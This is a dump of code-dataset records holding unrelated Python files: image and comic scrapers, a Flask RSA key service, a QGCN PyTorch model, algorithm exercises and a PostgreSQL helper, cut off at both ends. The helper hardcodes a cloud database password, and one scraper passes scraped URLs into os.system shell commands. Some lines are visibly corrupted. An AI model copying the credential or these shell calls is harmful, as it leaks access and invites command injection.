docs = collection.find({\"images_downloaded\": None}).limit(20).skip(skip)\n for doc in docs:\n # print doc\n local_folder = doc[\"local_folder\"]\n title = doc[\"title\"]\n total_page = doc[\"total_page\"]\n first_page = doc[\"first_page\"]\n #print first_page\n #print total_page\n page_path = first_page.__str__().replace('1.jpg', '')\n #print page_path\n number = 1\n while int(number) <= int(total_page):\n url = page_path + number.__str__() + '.jpg'\n print(url)\n data = urllib.urlopen(url).read()\n path = local_folder + '/' + title + '_' + number.__str__() + '.jpg'\n if not (os.path.exists(path)):\n f = file(path, \"wb\")\n f.write(data)\n f.flush()\n f.close()\n number = number + 1\n collection.update({\n \"_id\": doc[\"_id\"]\n }, {\n \"$set\": {\n \"images_downloaded\": 1\n }\n })\n\n\n# Connect MongoDB Server\nclient = pymongo.MongoClient(host=\"127.0.0.1\", port=27017)\n# Connect Database\ndb = client.beauty\n# Use collection\ncollection = db['mm131']\ncount = collection.find({\"images_downloaded\": None}).count()\n\nwhile count > 0:\n threads = []\n t1 = threading.Thread(target=download_20_pages, args=(0, ))\n threads.append(t1)\n #t2 = threading.Thread(target=download_20_pages,args=(20,))\n #threads.append(t2)\n #t3 = threading.Thread(target=download_20_pages,args=(40,))\n #threads.append(t3)\n #t4 = threading.Thread(target=download_20_pages,args=(60,))\n #threads.append(t4)\n\n for t in threads:\n t.setDaemon(True)\n t.start()\n t.join()\n count = collection.find({\"images_downloaded\": None}).count()\n","sub_path":"Download_Image.py","file_name":"Download_Image.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"593856242","text":"def writeKeyValue(array):\n\n counter = 0\n\n newArray = []\n\n keyValues = {\n \"year\" : 0,\n \"exports\" : 0,\n \"weight\" : 0,\n \"area\" : 0,\n \"growers\" : 0\n }\n\n for i in range(len(array)):\n if(counter == 0):\n keyValues[\"year\"] = array[i]\n counter += 1\n 
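# each run of five consecutive values in the flat input array is one record, in the fixed order\n        # year, exports, weight, area, growers; 'counter' tracks the position inside the current group\n        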
elif (counter == 1):\n keyValues[\"exports\"] = array[i]\n counter += 1\n elif (counter == 2):\n keyValues[\"weight\"] = array[i]\n counter += 1\n elif (counter == 3):\n keyValues[\"area\"] = array[i]\n counter += 1\n elif (counter == 4):\n keyValues[\"growers\"] = array[i]\n counter = 0\n newArray.append(keyValues)\n keyValues = {\n \"year\" : 0,\n \"exports\" : 0,\n \"weight\" : 0,\n \"area\" : 0,\n \"growers\" : 0\n }\n\n\n for j in range(len(newArray)):\n data = newArray[j]\n printData = \"{\\n\" + \" year: \" + str(data[\"year\"]) + \",\"\n printData += \"\\n exports: \" + str(data[\"exports\"]) + \",\"\n printData += \"\\n weight: \" + str(data[\"weight\"]) + \",\"\n printData += \"\\n area: \" + str(data[\"area\"]) + \",\"\n printData += \"\\n growers: \" + str(data[\"growers\"]) + \"\\n}\"\n if(j != len(newArray) - 1):\n printData += \",\"\n print(printData)\n\t\t\ndataArray = [2002,0.6,0,0,0,2003,0.9,0,112,0,2004,0.6,0,112,0,2005,0.5,0,112,0,2006,0.2,0,112,0,2007,0.3,0,29,0,2008,0,0,37,0,2009,0.5,0,37,0,2010,0.5,0,37,0,2011,0.4,0,37,0,2012,0.3,0,37,0,2013,0.2,0,37,0,2014,0.2,0,43,0]\n\nwriteKeyValue(dataArray)\n\t\n\t\n \n","sub_path":"Portfolio/PortfolioFiles/Sprint 2 deliverables/dataTransformScript.py","file_name":"dataTransformScript.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55373675","text":"import io\n\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom flask import send_file, request\nfrom flask_restful import Resource\n\n\nclass PrivateKey(Resource):\n\n @classmethod\n def get(cls):\n private_key = rsa.generate_private_key(\n public_exponent=65537,\n key_size=2048,\n backend=default_backend()\n )\n\n pem = private_key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.PKCS8,\n encryption_algorithm=serialization.NoEncryption()\n )\n\n with open('privatekey.cer', 'wb') as f:\n f.write(pem)\n\n return send_file(\n io.BytesIO(pem),\n attachment_filename='privatekey.cer',\n mimetype='application/x-x509-ca-cert'\n )\n\n\nclass PublicKey(Resource):\n\n @classmethod\n def get(cls):\n # print(request.files)\n private_key = request.files['private_key']\n private_key = serialization.load_pem_private_key(\n private_key.read(),\n password=None,\n backend=default_backend()\n )\n\n public_key = private_key.public_key()\n pub = public_key.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo\n )\n\n with open('publickey.cer', 'wb') as f:\n f.write(pub)\n f.close()\n\n return send_file(\n io.BytesIO(pub),\n attachment_filename='publickey.cer',\n mimetype='application/x-x509-ca-cert'\n )\n","sub_path":"resources/keys.py","file_name":"keys.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"306429418","text":"##def cariLurus(wadah,target):\n## n=len(wadah)\n## for i in range(n):\n## if wadah[i]==target:\n## return True\n## return False\n##class mhsTi(object):\n## def __init__(self,nama,nim,kota,us):\n## self.nama=nama\n## self.nim=nim\n## self.kotaTinggal=kota\n## self.uangsaku=us\n## 
\n##a1=mhsTi('Taki',12,'Solo',400000)\n##a2=mhsTi('ciko',10,'Sukoharjo',4500000)\n##a3=mhsTi('ahmad',11,'Klaten',475000)\n##a4=mhsTi('zaki',13,'Kra',450000)\n##a5=mhsTi('putri',14,'Jogja',300000)\n##a6=mhsTi('malu',15,'Surabaya',600000)\n##a7=mhsTi('wani',16,'Bandung',1000000)\n##\n##Daftar=[a1,a2,a3,a4,a5,a6,a7]\n##\n##target='Klaten'\n##for i in Daftar:\n## if i.kotaTinggal==target:\n## print(i.nama+' tinggal di '+target)\n##\n##def cariTerkecil(kumpulan):\n## n=len(kumpulan)\n## terkecil=kumpulan[0]\n## for i in range(1,n):\n## if kumpulan[i]1 and (sys.argv[1] == '-a' or sys.argv[1] == '--all'):\n print('\\n'.join(library.keys()))\n sys.exit(\"\\n### End Of Library ###\\n\")\n\n if len(sys.argv)>1 and (sys.argv[1] == '-l' or sys.argv[1] == '--list'):\n restrict_list = [name for name in library.keys() if name[0] == sys.argv[2]]\n print('\\n'.join(restrict_list))\n sys.exit(\"\\n### End Of List ###\\n\")\n\n if len(sys.argv)>1 and (sys.argv[1] == '-c' or sys.argv[1] == '--comic'):\n print(str(sys.argv[2]))\n user_input = str(sys.argv[2])\n else:\n user_input = input(\"Which comic would you like to download?\\n\")\n\n url_home_page = library[user_input]\n print(\"Processing...\")\n\n library[user_input]\n try:\n browser = webdriver.Firefox()\n except:\n browser = webdriver.Firefox(executable_path='/path/to/geckodriver')\n\n\n # In[8]:\n\n\n browser.get(url_home_page)\n WebDriverWait(browser, timeout=10).until(lambda d: d.find_element_by_id(\"list\"))\n nb_chapters = browser.find_elements_by_xpath(\"//tbody/tr\")\n\n if len(nb_chapters)>1:\n print('\\nDetected several chapters...')\n input_chapter = input(\"Please specify which one of the following you would like to download.\\nFor example: #2\\n\\n\")\n input_chapter = input_chapter.split('#')[1]\n else:\n input_chapter = \"TPB\"\n\n\n # In[9]:\n print(\"...\")\n\n # url_chapter = browser.find_element_by_xpath(\"//tbody/tr[%i]/td[1]/a\"%input_chapter).get_attribute('href')\n # folder_to_create = browser.find_element_by_xpath(\"//tbody/tr[%i]/td[1]/a\"%input_chapter).text.replace(' ','_')\n url_chapter = url_home_page.replace('comicextra.com/comic','comicextra.com')+'/chapter-'+input_chapter\n folder_to_create = '-'.join(url_chapter.split('/')[-2:])\n\n # In[10]:\n\n\n browser.get(url_chapter)\n WebDriverWait(browser, timeout=20).until(lambda d: d.find_element_by_class_name('label1'))\n\n page_number = int(browser.find_element_by_class_name('label1').text.split(' ')[1])\n\n list_pages = []\n os.system(\"mkdir %s\"%folder_to_create)\n\n for i in range(1,page_number+1):\n if i==1:\n browser.get(url_chapter)\n WebDriverWait(browser, timeout=10).until(lambda d: d.find_element_by_id('main_img'))\n page = browser.find_element_by_id('main_img').get_attribute('src')\n list_pages.append(page)\n print(\"Downloading %s: page %i/%i\"%(folder_to_create,i,page_number))\n os.system(\"wget -q '%s' -O %s/%i.jpeg &> /dev/null\"%(page,folder_to_create,i))\n else:\n browser.get(url_chapter+'/%i'%i)\n WebDriverWait(browser, timeout=10).until(lambda d: d.find_element_by_id('main_img'))\n page = browser.find_element_by_id('main_img').get_attribute('src')\n list_pages.append(page)\n print(\"Downloading %s: page %i/%i\"%(folder_to_create,i,page_number))\n os.system(\"wget -q '%s' -O %s/%i.jpeg &> /dev/null\"%(page,folder_to_create,i))\n browser.quit()\n os.system(\"zip -qr %s.zip %s\"%(folder_to_create,folder_to_create))\n os.system(\"rm -rf geckodriver.log %s/\"%folder_to_create)\n print(\"Download complete - File created: %s.zip\"%folder_to_create)\n\nif __name__ 
== '__main__':\n    main()\n","sub_path":"build/lib/get_comics/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"566358366","text":"import math\n\ndef divisors(n):\n    limit = int(math.ceil(math.sqrt(n)))\n    lowdivs = [x for x in range(1, limit+1) if n % x == 0]\n    highdivs = [n // d for d in lowdivs]\n    alldivs = set(lowdivs + highdivs)\n    properdivs = alldivs.difference(set([n]))\n    return list(properdivs)\n\ndef amicable(n):\n    m = sum(divisors(n))\n    k = sum(divisors(m))\n    return n == k and n != m\n\ndef solution():\n    return sum(filter(amicable, range(1,10000)))\n\nif __name__ == \"__main__\":\n    print(solution())\n","sub_path":"src/p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"207054659","text":"import operator\nclass Solution(object):\n    def findMinHeightTrees(self, n, edges):\n        \"\"\"\n        :type n: int\n        :type edges: List[List[int]]\n        :rtype: List[int]\n        \"\"\"\n        if n == 1:\n            return [0]\n        graph = self.buildGraph(n, edges)\n        res = []\n        for i in range(n):\n            res.append((self.calcHeight(i, graph), i))\n        res.sort()\n        minHeight = res[0][0]\n        i = 0\n        while i < len(res) and res[i][0] == minHeight:\n            i += 1\n        return [j[1] for j in res[:i]]\n\n    def buildGraph(self, n, edges):\n        graph = []\n        for i in range(n):\n            graph.append([])\n        for edge in edges:\n            graph[edge[0]].append(edge[1])\n            graph[edge[1]].append(edge[0])\n        return graph\n\n    def calcHeight(self, node, graph):\n        queue = []\n        queue.append((node, 0))\n        i = 0\n        marked = [False, ]*len(graph)\n        while i < len(queue):\n            adjs = graph[queue[i][0]]\n            marked[queue[i][0]] = True\n            for adj in adjs:\n                if not marked[adj]:\n                    queue.append((adj, queue[i][1]+1))\n            i += 1\n        queue.sort(key=operator.itemgetter(1), reverse=True)\n        return queue[0][1]\n\nif __name__ == \"__main__\":\n    s = Solution()\n    g = [[3, 0], [3, 1], [3, 2], [3, 4], [5, 4]]\n    print(s.findMinHeightTrees(6, g))\n","sub_path":"exercise/leetcode/python_src/by2017_Sep/Leet310.py","file_name":"Leet310.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"575059875","text":"\"\"\"\nQGCN model implementation. 
First there are layers of GCN, then a bilinear layer (the last layer of the QGCN), and then\nthere is the QGCN which have them both.\n\"\"\"\n\nimport json\nfrom torch.nn import Module, Linear, Dropout, Embedding, ModuleList, Sequential, LogSoftmax\nimport torch\nfrom torch.optim import Adam, SGD\nfrom torch.utils.data import DataLoader\n\nADAM_ = Adam\nSGD_ = SGD\nrelu_ = torch.relu\nsigmoid_ = torch.sigmoid\ntanh_ = torch.tanh\n\n\n\"\"\"\ngiven A, x0 : A=Adjacency_matrix, x0=nodes_vec\nFirst_model => x1(n x k) = sigma( A(n x n) * x0(n x d) * W1(d x k) )\nBilinear_model => x2(1 x 1) = sigma( W2(1 x k) * trans(x1)(k x n) * A(n x n) * x0(n x d) * W1(d x 1) )\n\"\"\"\n\n\n# class of GCN model\nclass GCN(Module):\n def __init__(self, in_dim, out_dim, activation, dropout):\n super(GCN, self).__init__()\n # useful info in forward function\n self._linear = Linear(in_dim, out_dim)\n self._activation = activation\n self._dropout = Dropout(p=dropout)\n self._gpu = True # turn to True if you have access to gpu\n\n def forward(self, A, x0):\n # Dropout layer\n x0 = self._dropout(x0)\n # tanh( A(n x n) * x0(n x d) * W1(d x k) )\n Ax = torch.matmul(A, x0)\n\n x = self._linear(Ax)\n x1 = self._activation(x) - 2/(x**2+1)\n \n return x1\n \n\n# class of last layer of the QGCN\nclass QGCNLastLayer(Module):\n def __init__(self, left_in_dim, right_in_dim, out_dim):\n super(QGCNLastLayer, self).__init__()\n # useful info in forward function\n self._left_linear = Linear(left_in_dim, 1)\n self._right_linear = Linear(right_in_dim, out_dim)\n self._gpu = False\n\n def forward(self, A, x0, x1):\n x1_A = torch.matmul(x1.permute(0, 2, 1), A)\n W2_x1_A = self._left_linear(x1_A.permute(0, 2, 1))\n W2_x1_A_x0 = torch.matmul(W2_x1_A.permute(0, 2, 1), x0)\n W2_x1_A_x0_W3 = self._right_linear(W2_x1_A_x0)\n return W2_x1_A_x0_W3.squeeze(dim=1)\n\n\n# final model of QGCN\nclass QGCN(Module):\n \"\"\"\n first linear layer is executed numerous times\n \"\"\"\"\"\n\n def __init__(self, params, in_dim, embed_vocab_dim):\n super(QGCN, self).__init__()\n self._params = params[\"model\"] if type(params) is dict else json.load(open(params, \"rt\"))[\"model\"]\n\n # add embedding layers if needed, also is the data binary or not\n self._is_binary = True if self._params[\"label_type\"] == \"binary\" else False\n self._is_embed = True if self._params[\"use_embeddings\"] == \"True\" else False\n\n # dimensions of the GCN layers according to the params json file\n qgcn_layers_dim = [{\"in\": layer[\"in_dim\"], \"out\": layer[\"out_dim\"]} for layer in self._params[\"GCN_layers\"]]\n qgcn_layers_dim[0][\"in\"] = in_dim\n\n # if embedding is given there are also layer for the embedding\n if self._is_embed:\n # embeddings are added to ftr vector -> update dimensions of relevant weights\n qgcn_layers_dim[0][\"in\"] += sum(self._params[\"embeddings_dim\"])\n\n # add embedding layers\n self._embed_layers = []\n for vocab_dim, embed_dim in zip(embed_vocab_dim, self._params[\"embeddings_dim\"]):\n self._embed_layers.append(Embedding(vocab_dim, embed_dim))\n self._embed_layers = ModuleList(self._embed_layers)\n \n values_out = [qgcn_layers_dim[i][\"out\"] for i in range(len(qgcn_layers_dim))]\n values_out.append(qgcn_layers_dim[0][\"in\"])\n sum_layers_shape = sum(values_out)\n\n self._num_layers = len(self._params[\"GCN_layers\"])\n self._linear_layers = []\n # create linear layers\n self._linear_layers = ModuleList([GCN(qgcn_layers_dim[i][\"in\"], qgcn_layers_dim[i][\"out\"],\n globals()[self._params[\"activation\"]], 
self._params[\"dropout\"])\n for i in range(self._num_layers)])\n \n # W2_x1_A_x0_W3 where x1 is the last layer of GCN and x0 is the input layer (what we have done in our experiments)\n if self._params[\"f\"] == \"x1_x0\":\n qgcn_right_in = in_dim + sum(self._params[\"embeddings_dim\"])\n qgcn_left_in = qgcn_layers_dim[-1][\"out\"]\n # W2_x1_A_x1_W3 where x1 is the last layer of GCN\n elif self._params[\"f\"] == \"x1_x1\":\n qgcn_right_in = qgcn_layers_dim[-1][\"out\"]\n qgcn_left_in = qgcn_layers_dim[-1][\"out\"]\n # W2_c_A_x0_W3 where c is the concatanation of all layers of GCN andx1 is the last layer of GCN\n elif self._params[\"f\"] == \"c_x1\":\n qgcn_right_in = qgcn_layers_dim[-1][\"out\"]\n qgcn_left_in = sum_layers_shape\n # if invalid value is inserted, do the regular version - \"x1_x0\"\n else:\n qgcn_right_in = in_dim + sum(self._params[\"embeddings_dim\"])\n qgcn_left_in = qgcn_layers_dim[-1][\"out\"]\n \n self._qgcn_last_layer = QGCNLastLayer(left_in_dim=qgcn_left_in, right_in_dim=qgcn_right_in,\n out_dim=1 if self._is_binary else self._params[\"num_classes\"])\n \n self._softmax = LogSoftmax(dim=1)\n self.optimizer = self.set_optimizer(self._params[\"lr\"], globals()[self._params[\"optimizer\"]], self._params[\"L2_regularization\"])\n\n def set_optimizer(self, lr, opt, weight_decay):\n return opt(self.parameters(), lr=lr, weight_decay=weight_decay)\n\n def _fix_shape(self, input):\n return input if len(input.shape) == 3 else input.unsqueeze(dim=0)\n\n def forward(self, A, x0, embed):\n if self._is_embed:\n list_embed = []\n for i, embedding in enumerate(self._embed_layers):\n list_embed.append(embedding(embed[:, :, i]))\n x0 = torch.cat([x0] + list_embed, dim=2)\n\n x1 = x0\n H_layers = [x1]\n for i in range(self._num_layers):\n x1 = self._linear_layers[i](A, x1)\n H_layers.append(x1)\n\n c = torch.cat(H_layers, dim=2)\n\n if self._params[\"f\"] == \"x1_x0\":\n x2 = self._qgcn_last_layer(A, x0, x1)\n elif self._params[\"f\"] == \"x1_x1\":\n x2 = self._qgcn_last_layer(A, x1, x1)\n elif self._params[\"f\"] == \"c_x1\":\n x2 = self._qgcn_last_layer(A, x1, c)\n else: # like \"x1_x0\"\n x2 = self._qgcn_last_layer(A, x0, x1)\n\n x2 = torch.sigmoid(x2) if self._is_binary else self._softmax(x2)\n return x2\n","sub_path":"QGCN/QGCN_model/QGCN.py","file_name":"QGCN.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"460642058","text":"import tensorflow as tf\ntf.enable_eager_execution()\nfrom tensorflow import keras\nfrom keras import losses\nimport numpy as np\nimport matplotlib.pyplot as plt\n\"\"\"\nfrom Data import getX, getY, getFalseX, getFalseY\n\ntrain_arrays = getX(0, True)\ntrain_labels = getY(0, True)\ntrain_labels = train_labels.reshape((-1, 1))\n\"\"\"\ntrain_arrays = np.array([\n [1, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 1, 1],\n [0, 0, 1],\n [0, 1, 1],\n [1, 0, 1],\n [1, 0, 0],\n [1, 0, 1],\n [1, 1, 1],\n [0, 0, 0],\n [0, 1, 1],\n [0, 1, 1],\n [1, 0, 1],\n [0, 1, 0],\n [0, 0, 0],\n [0, 0, 1],\n [1, 0, 1],\n [1, 1, 0],\n [0, 1, 0]\n ])\n\ntrain_labels = np.array([\n 1,\n 0,\n 1,\n 1,\n 0,\n 0,\n 1,\n 1,\n 1,\n 1,\n 0,\n 0,\n 0,\n 1,\n 0,\n 0,\n 0,\n 1,\n 1,\n 0\n ]).T\n\n\ntrain_arrays = train_arrays.astype(int)\ntrain_labels = train_labels.astype(int)\n\n\nepochs = 6\n\n\nmodel = keras.Sequential([\n keras.layers.Flatten(),\n #keras.layers.Dense(3200, activation=tf.nn.relu),\n #keras.layers.Dropout(.2),\n #keras.layers.Dense(160, activation=tf.nn.relu),\n 
#keras.layers.Dropout(.2),\n keras.layers.Dense(4, activation=tf.nn.relu),\n keras.layers.Dropout(.2),\n keras.layers.Dense(2, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\nval_arrays = np.array([\n [0, 0, 0],\n [1, 1, 1],\n [1, 0, 1],\n [0, 1, 1],\n [0, 0, 1],\n [1, 1, 0],\n [1, 0, 0],\n [0, 1, 0]\n])\n\nval_labels = np.array([\n 0,\n 1,\n 1,\n 0,\n 0,\n 1,\n 1,\n 0\n]).T\n\ntrain = model.fit(train_arrays, train_labels, validation_data=(val_arrays, val_labels),\n epochs=epochs, verbose=2, shuffle=True, batch_size=20)\n\n\nhistory_dict = train.history\nprint(history_dict.keys())\n\nacc = np.array(history_dict['acc'])\nloss = np.array(history_dict['loss'])\n\n\nepochs = range(1, len(acc) + 1)\n\nplt.plot(epochs, acc, 'r', label='Training Accuracy')\nplt.plot(epochs, loss, 'b', label='Training Loss')\nplt.title(\"Training Accuracy and Loss\")\nplt.xlabel(\"Epochs\")\n\nplt.show()\n\n\"\"\"\ntrain_arrays = tf.cast(train_arrays, tf.float32)\ntrain_labels = tf.cast(train_labels, tf.float32)\n\ntf.print(train_arrays)\ntf.print(train_labels)\n\ntf.print(train_arrays)\ntf.print(train_labels)\n# Prints normalized data, in a long list\ntf.print(str(train_arrays))\ntf.print(str(train_labels))\n\nepochs = 20\nsteps_per_epoch = 1\n\n\ndataset = tf.data.Dataset.from_tensor_slices((train_arrays, train_labels)) # .repeat(count=3)\n\n\n\n\n\nmodel = keras.Sequential([\n keras.layers.Flatten(),\n keras.layers.Dense(6, activation=tf.nn.relu),\n keras.layers.Dense(1, activation=tf.nn.softmax)\n])\n\nmodel.compile(optimizer=tf.train.AdamOptimizer(),\n loss=losses.binary_crossentropy,\n metrics=['accuracy'])\n\ntrain = model.fit(dataset, steps_per_epoch=steps_per_epoch, epochs=epochs, verbose=2, shuffle=True)\n\n\n\n\nhistory_dict = train.history\nhistory_dict.keys()\n\nacc = history_dict['acc']\nloss = history_dict['acc']\n\n\nplt.plot(epochs, acc, 'r', label='Training Accuracy')\nplt.plot(epochs, loss, 'b', label='Training Loss')\nplt.title(\"Training Accuracy and Loss\")\nplt.xlabel(\"Epochs\")\n\nplt.show()\n\n\"\"\"\n","sub_path":"venv/Code/UpdateofOldProject.py","file_name":"UpdateofOldProject.py","file_ext":"py","file_size_in_byte":3797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"201489218","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 6 17:07:05 2018\n\n@author: Oliver\n\"\"\"\n\n#s = \"abc\"\n#print(s[0:2])\n\nan_letters = \"aefhilmnorsxAEFHILMNORSX\"\nword = input(\"I will cheer for you! Enter a word: \")\ntimes = int(input(\"Enthusiasm level (1-10): \"))\n\nfor char in word:\n if char in an_letters:\n print(\"Give me an \" + char + \"! \" + char)\n else:\n print(\"Give me a \" + char + \"! 
\" + char)\n \nprint(\"What does that spell?\")\nfor i in range(times):\n print(word, \"!!!\")\n\n\n","sub_path":"Lecture_Notes/L3.py","file_name":"L3.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"482767845","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0002_auto_20160115_0857'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='myuser',\n options={'verbose_name_plural': 'users'},\n ),\n migrations.AddField(\n model_name='myuser',\n name='avatar',\n field=models.ImageField(default=b'static/default_avatar.png', upload_to=b'static/', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='myuser',\n name='phone',\n field=models.CharField(default=b'', max_length=20, blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='myuser',\n name='skype',\n field=models.CharField(default=b'', max_length=20, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"accounts/migrations/0003_auto_20160115_1645.py","file_name":"0003_auto_20160115_1645.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"110560710","text":"from Vitals import *\nimport postgresql.driver as driver\nimport postgresql\n\ndef connectAWS():\n aws = driver.connect(user = 'recondbmaster', password = '6g549xt2ydu12', host = 'recondb.cz9q37pduulj.us-west-2.rds.amazonaws.com', port = 5432, database = 'Recon')\n return aws\n\n#Adds generic summoner (i.e. not Master or Challenger tier) to database\ndef addSumm(db, id, tier, div, region):\n\n insert = db.prepare(\n '''\n INSERT INTO \"summoners\"(id, name, tier, division, region, matches) VALUES ($1, NULL, $2, $3, $4, NULL);\n '''\n )\n\n insert(id, tier, div, region)\n db.close()\n\n#Returns list of all summoner IDs\ndef getSumms(db):\n summList = []\n\n get = db.prepare('''\n SELECT id FROM \"summoners\";\n ''')\n raw = get()\n for each in raw:\n summList.append(each['id'])\n return summList\n\ndef getSummsFromTier(db,tier):\n summList = []\n\n get = db.prepare('''\n SELECT * FROM \"summoners\"\n WHERE tier = $1\n ORDER BY oid;\n ''')\n raw = get(tier)\n for each in raw:\n summList.append(each['id'])\n return summList\n\n#Returns list of all match IDs\ndef getMatches(db):\n matchList = []\n\n get = db.prepare('''\n SELECT id FROM \"matches\"\n ORDER BY oid;\n ''')\n raw = get()\n for each in raw:\n matchList.append(each['id'])\n return matchList\n\n#Adds match to database\ndef addMatch(db, id, tier, patch, data):\n\n insert = db.prepare('''\n INSERT INTO \"matches\"(id, tier, patch, data) VALUES ($1, $2, $3, $4);\n ''')\n\n insert(id, tier, patch, data)\n\n#Checks to see if given match is already recorded in database\ndef checkMatchExists(db, id):\n\n select = db.prepare(\n '''\n SELECT * FROM \"matches\"\n WHERE id = $1\n LIMIT 1;\n '''\n )\n\n a = select(id)\n if not a: return False\n else: return True\n\n#Checks to see if given summoner is already recorded in database\ndef checkSummExists(db, id):\n select = db.prepare(\n '''\n SELECT * FROM \"summoners\"\n WHERE id = $1\n LIMIT 1;\n '''\n )\n\n a = select(id)\n if not a: return False\n else: return True\n\n#Returns all data for given MatchID\ndef getMatch(db, id):\n select = db.prepare(\n '''\n SELECT * FROM \"matches\"\n 
WHERE id = $1 LIMIT 1;\n '''\n )\n\n match = select(id)[0]\n return match\n\ndef getSummTier(db, id):\n getter = db.prepare('''\n SELECT tier FROM \"summoners\"\n WHERE id = $1;\n ''')\n\n tier = getter(id)[0]['tier']\n return tier\n\ndef getSummDiv(db, id):\n getter = db.prepare('''\n SELECT division FROM \"summoners\"\n WHERE id = $1;\n ''')\n\n div = getter(id)[0]['division']\n return div\n\ndef getSummMatches(db, id):\n getter = db.prepare('''\n SELECT matches FROM \"summoners\"\n WHERE id = $1\n LIMIT 1;\n ''')\n matchList = getter(id)[0]['matches']\n return matchList\n\ndef deleteSummsNotSolo(db):\n allSumms = []\n allRanks = []\n\n getter = db.prepare('''\n SELECT * from \"summoners\";\n ''')\n\n setter = db.prepare('''\n UPDATE \"summoners\"\n SET tier = $1\n WHERE id = $2;\n ''')\n\n deleter = db.prepare('''\n DELETE FROM \"summoners\"\n WHERE id = $1;\n ''')\n\n raw = getter()\n for each in raw:\n flag = False\n url = \"https://na.api.pvp.net/api/lol/na/v2.5/league/by-summoner/\" + each['id'] + \"?api_key=\" + KEY\n response = getURL(url)\n if response != None:\n response = response.json()\n for league in response[each['id']]:\n if league['queue'] == \"RANKED_SOLO_5x5\":\n setter(league['tier'], each['id'])\n flag = True\n if flag == False:\n print(\"Deleting: \" + each['id'])\n deleter(each['id'])\n\ndef temp(db):\n db = connectLocal()\n\n update = db.prepare('''\n UPDATE \"summoners\"\n SET matches = $1\n WHERE id = $2\n ''')\n\n for each in allMatches:\n raw = getMatch(each)\n players = []\n stats = json.loads(raw['data'])\n for each2 in stats['participantIdentities']:\n players.append(each2['player']['summonerId'])\n for each3 in players:\n matchList = json.loads(getSummMatches(db,str(each3)))\n if each not in matchList:\n matchList.append(each)\n update(json.dumps(matchList), str(each3))\n","sub_path":"database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"107396299","text":"from collections import defaultdict\nfrom typing import Dict, List, Tuple\n\nimport config\n\n\nACTIVE = '#'\n\n\ndef iterate_conway_cubes(zeroeth_layer: List[str]) -> Dict[Tuple[int], int]:\n \"\"\"Iterate 6 cycles for Conway Cubes.\n\n Args:\n zeroeth_layer (List[str]): the zeroeth layer with cubes\n\n \"\"\"\n cube = defaultdict(int)\n offset = len(zeroeth_layer) // 2\n for y, line in enumerate(zeroeth_layer):\n y += offset\n for x, char in enumerate(line):\n x -= offset\n if char == ACTIVE:\n cube[(x, y)] += 1\n cube[(x, y)] %= 2\n\n return cube\n\n\ndef main() -> None:\n \"\"\"Simulate cycles for Conway Cubes.\"\"\"\n test_answer = 112\n file = config.TestFile(test_answer)\n test = iterate_conway_cubes(file.contents)\n file.test(test)\n\n file = config.File()\n result = iterate_conway_cubes(file.contents)\n config.LOGGER.info(result)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2020/17/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"585795655","text":"# -*- coding: utf-8 -*-\nfrom iati.calculatesplits import CalculateSplits\nfrom iati.lookups import Lookups\nfrom iati.transaction import Transaction\n\n\nclass Activity:\n def __init__(self, dactivity):\n \"\"\"\n Use the get_activity static method to construct\n \"\"\"\n self.dactivity = dactivity\n self.identifier = dactivity.identifier\n # Get the reporting-org and C19 strictness at 
